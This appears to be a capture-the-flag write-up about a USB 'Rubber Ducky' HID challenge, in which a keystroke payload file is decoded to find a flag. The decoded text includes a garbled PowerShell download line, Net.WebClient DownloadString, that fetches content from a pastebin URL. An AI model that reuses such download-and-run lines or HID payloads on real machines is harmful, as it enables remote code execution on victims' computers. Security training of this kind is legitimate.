Tags: rubber-ducky hid
Rating: 5.0
# HID
## Task
One of my colleagues found a USB stick in the parking lot in front of our company. Fortunately he handed it over directly to us . The drive contains an SD card with just one file. Maybe it's no normal USB flash drive?
File: inject.bin
Tags: binary-analysis
## Solution
A USB device can be used as a HID (Human-Interface-Device). It looks like a USB stick, but is actually a keyboard. This is called HID attack or BadUSB.
What you think you get: a filesystem.
What you get: a keyboard that launches malicious commands to take over your computer.
The tag is very misleading. This isn't binary analysis, we actually just need to find the tool that was used to encode this keyboard inputs.
A very popular device is the Rubber Ducky.
`The USB Rubber Ducky injects keystrokes at superhuman speeds`
While researching I came across this very interesting post: https://security.stackexchange.com/a/109595
It is definitely worth a read. There is also a link to a repository: https://github.com/brandonlw/Psychson#running-demo-1-hid-payload
There is explained how to use the `Duckencoder` to encode the `Rubber Ducky format`. There is also a link to a decoder: https://github.com/midnitesnake/usb-rubber-ducky (forwarded from the google url).
We can use the `Decode/ducky-decode.pl` script to decode the `inject.bin`.
```bash
$ perl ducky-decode.pl -f inject.bin > decoded.txt
```
In the decoded file we find a lot of errors, like `windowstzle`. The keyboard layout is obviously wrong. We could fix that by changing the replacements in the script, but let's look for the flag first.
After scrolling down a lot and filtering out noise we find this:
`N e t . W e b C l i e n t ( . D o w n l o a d S t r i n g * | h t t p s > & & p a s t e b i n . c o m & r a w & Y R D 8 j s v d | ( < @`
Now we just need to replace `Y` with `Z`, `>` with `:`, `&` with `/` and open the correct url. Done.
